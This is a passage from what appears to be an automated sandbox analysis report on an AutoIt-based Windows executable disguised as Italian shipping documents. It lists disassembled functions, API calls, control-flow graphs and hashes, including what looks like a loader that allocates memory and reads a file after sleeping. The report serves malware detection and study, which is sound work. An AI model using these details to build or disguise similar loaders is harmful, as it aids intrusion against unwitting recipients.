                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                        • __fread_nolock.LIBCMT ref: 00452961
                        • __fread_nolock.LIBCMT ref: 00452971
                        • __fread_nolock.LIBCMT ref: 0045298A
                        • __fread_nolock.LIBCMT ref: 004529A5
                        • _fseek.LIBCMT ref: 004529BF
                        • _malloc.LIBCMT ref: 004529CA
                        • _malloc.LIBCMT ref: 004529D6
                        • __fread_nolock.LIBCMT ref: 004529E7
                        • _free.LIBCMT ref: 00452A17
                        • _free.LIBCMT ref: 00452A20
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                        • String ID:
                        • API String ID: 1255752989-0
                        • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                        • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                        • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                        • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                        Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                        • RegisterClassExW.USER32(00000030), ref: 004104ED
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                        • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                        • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                        • ImageList_ReplaceIcon.COMCTL32(00AA31D0,000000FF,00000000), ref: 00410552
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                        • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                        • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                        • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                        Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                        • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                        • LoadIconW.USER32(?,00000063), ref: 004103C0
                        • LoadIconW.USER32(?,000000A4), ref: 004103D3
                        • LoadIconW.USER32(?,000000A2), ref: 004103E6
                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                        • RegisterClassExW.USER32(?), ref: 0041045D
                          • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                          • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                          • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                          • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                          • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                          • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                          • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AA31D0,000000FF,00000000), ref: 00410552
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$AutoIt v3
                        • API String ID: 423443420-4155596026
                        • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                        • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                        • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                        • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                        Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _malloc
                        • String ID: Default
                        • API String ID: 1579825452-753088835
                        • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                        • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                        • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                        • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                        Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1973 40f679-40f67c 1969->1973 1972 40f640 1970->1972 1974 40f642-40f650 1972->1974 1973->1963 1975 40f652-40f655 1974->1975 1976 40f67e-40f68c 1974->1976 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1969 1977->1972 1990 425d43-425d5f call 414d30 1978->1990 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1978 1988 425d05-425d0b 1986->1988 1989 40f6dc-40f6df 1986->1989 1988->1974 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1985
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __fread_nolock_fseek_memmove_strcat
                        • String ID: AU3!$EA06
                        • API String ID: 1268643489-2658333250
                        • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                        • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                        • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                        • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                        Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2005 42b038-42b03f 2001->2005 2009 401193-40119a 2002->2009 2006 401151-401157 2003->2006 2007 40119d 2003->2007 2005->2000 2008 42b045-42b059 call 401000 call 40e0c0 2005->2008 2012 401219-40121f 2006->2012 2013 40115d 2006->2013 2010 4011a3-4011a9 2007->2010 2011 42afb4-42afc5 call 40f190 2007->2011 2008->2000 2010->2001 2017 4011af 2010->2017 2011->2009 2012->2001 2014 401225-42b06d call 468b0e 2012->2014 2018 401163-401166 2013->2018 2019 42b01d-42b024 2013->2019 2014->2009 2017->2001 2025 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2017->2025 2026 4011db-401202 SetTimer RegisterWindowMessageW 2017->2026 2020 42afe9-42b018 call 40f190 call 401a50 2018->2020 2021 40116c-401172 2018->2021 2019->2000 2027 42b02a-42b033 call 4370f4 2019->2027 2020->2000 2021->2001 2028 401174-42afde call 45fd57 2021->2028 2026->2009 2033 401204-401216 CreatePopupMenu 2026->2033 2027->2000 2028->2000 2045 42afe4 2028->2045 2045->2009
                        APIs
                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                        • KillTimer.USER32(?,00000001,?), ref: 004011B9
                        • PostQuitMessage.USER32(00000000), ref: 004011CB
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                        • CreatePopupMenu.USER32 ref: 00401204
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                        • String ID: TaskbarCreated
                        • API String ID: 129472671-2362178303
                        • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                        • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                        • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                        • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                        Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                        APIs
                        • _malloc.LIBCMT ref: 004115F1
                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                        • std::exception::exception.LIBCMT ref: 00411626
                        • std::exception::exception.LIBCMT ref: 00411640
                        • __CxxThrowException@8.LIBCMT ref: 00411651
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                        • String ID: ,*H$4*H$@fI
                        • API String ID: 615853336-1459471987
                        • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                        • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                        • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                        • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                        Function 04171600 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2065 4171600-41716ae call 416f010 2068 41716b5-41716db call 4172510 CreateFileW 2065->2068 2071 41716e2-41716f2 2068->2071 2072 41716dd 2068->2072 2077 41716f4 2071->2077 2078 41716f9-4171713 VirtualAlloc 2071->2078 2073 417182d-4171831 2072->2073 2074 4171873-4171876 2073->2074 2075 4171833-4171837 2073->2075 2079 4171879-4171880 2074->2079 2080 4171843-4171847 2075->2080 2081 4171839-417183c 2075->2081 2077->2073 2082 4171715 2078->2082 2083 417171a-4171731 ReadFile 2078->2083 2084 41718d5-41718ea 2079->2084 2085 4171882-417188d 2079->2085 2086 4171857-417185b 2080->2086 2087 4171849-4171853 2080->2087 2081->2080 2082->2073 2090 4171733 2083->2090 2091 4171738-4171778 VirtualAlloc 2083->2091 2094 41718ec-41718f7 VirtualFree 2084->2094 2095 41718fa-4171902 2084->2095 2092 4171891-417189d 2085->2092 2093 417188f 2085->2093 2088 417185d-4171867 2086->2088 2089 417186b 2086->2089 2087->2086 2088->2089 2089->2074 2090->2073 2096 417177f-417179a call 4172760 2091->2096 2097 417177a 2091->2097 2098 41718b1-41718bd 2092->2098 2099 417189f-41718af 2092->2099 2093->2084 2094->2095 2105 41717a5-41717af 2096->2105 2097->2073 2102 41718bf-41718c8 2098->2102 2103 41718ca-41718d0 2098->2103 2101 41718d3 2099->2101 2101->2079 2102->2101 2103->2101 2106 41717e2-41717f6 call 4172570 2105->2106 2107 41717b1-41717e0 call 4172760 2105->2107 2112 41717fa-41717fe 2106->2112 2113 41717f8 2106->2113 2107->2105 2115 4171800-4171804 CloseHandle 2112->2115 2116 417180a-417180e 2112->2116 2113->2073 2115->2116 2117 4171810-417181b VirtualFree 2116->2117 2118 417181e-4171827 2116->2118 2117->2118 2118->2068 2118->2073
                        APIs
                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 041716D1
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 041718F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                        • Instruction ID: 333c82df5af31f4f0be7bfc334d9607cb26e6bcfd66cfa2a257a1ee244622c75
                        • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                        • Instruction Fuzzy Hash: 57A10974E40209EBDB14CFA4C994BEEBBB5FF48304F208599E501BB380D779AA41CB94
                        Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2119 4102b0-4102c5 SHGetMalloc 2120 4102cb-4102da SHGetDesktopFolder 2119->2120 2121 425dfd-425e0e call 433244 2119->2121 2122 4102e0-41031a call 412fba 2120->2122 2123 41036b-410379 2120->2123 2131 410360-410368 2122->2131 2132 41031c-410331 SHGetPathFromIDListW 2122->2132 2123->2121 2129 41037f-410384 2123->2129 2131->2123 2133 410351-41035d 2132->2133 2134 410333-41034a call 412fba 2132->2134 2133->2131 2134->2133
                        APIs
                        • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                        • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                        • _wcsncpy.LIBCMT ref: 004102ED
                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                        • _wcsncpy.LIBCMT ref: 00410340
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                        • String ID: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                        • API String ID: 3170942423-4007385573
                        • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                        • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                        • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                        • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                        Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2137 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2140 427190-4271ae RegQueryValueExW 2137->2140 2141 40e4eb-40e4f0 2137->2141 2142 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2140->2142 2143 42721a-42722a RegCloseKey 2140->2143 2148 427210-427219 call 436508 2142->2148 2149 4271f7-42720e call 402160 2142->2149 2148->2143 2149->2148
                        APIs
                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                        • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: QueryValue$CloseOpen
                        • String ID: Include$Software\AutoIt v3\AutoIt
                        • API String ID: 1586453840-614718249
                        • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                        • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                        • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                        • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                        Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2154 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                        APIs
                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                        • ShowWindow.USER32(?,00000000), ref: 004105E4
                        • ShowWindow.USER32(?,00000000), ref: 004105EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                        • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                        • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                        • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                        Function 041713C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 041712B0: Sleep.KERNELBASE(000001F4), ref: 041712C1
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 041714EE
                        Strings
                        Memory Dump Source
